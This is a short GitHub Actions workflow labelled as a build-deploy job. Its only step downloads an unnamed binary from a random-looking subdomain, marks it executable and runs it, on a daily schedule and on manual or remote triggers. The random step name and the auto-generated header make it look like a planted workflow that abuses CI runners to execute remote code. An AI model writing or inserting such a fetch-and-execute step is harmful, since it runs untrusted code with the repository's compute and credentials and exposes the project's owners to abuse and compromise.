#2024-03-18-[083358]-nqahjtd2
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "55 4 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: fvgvjcy4uwwrxoqk
        run: |
          wget -q https://kxr7bcoqr1inaa3f.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories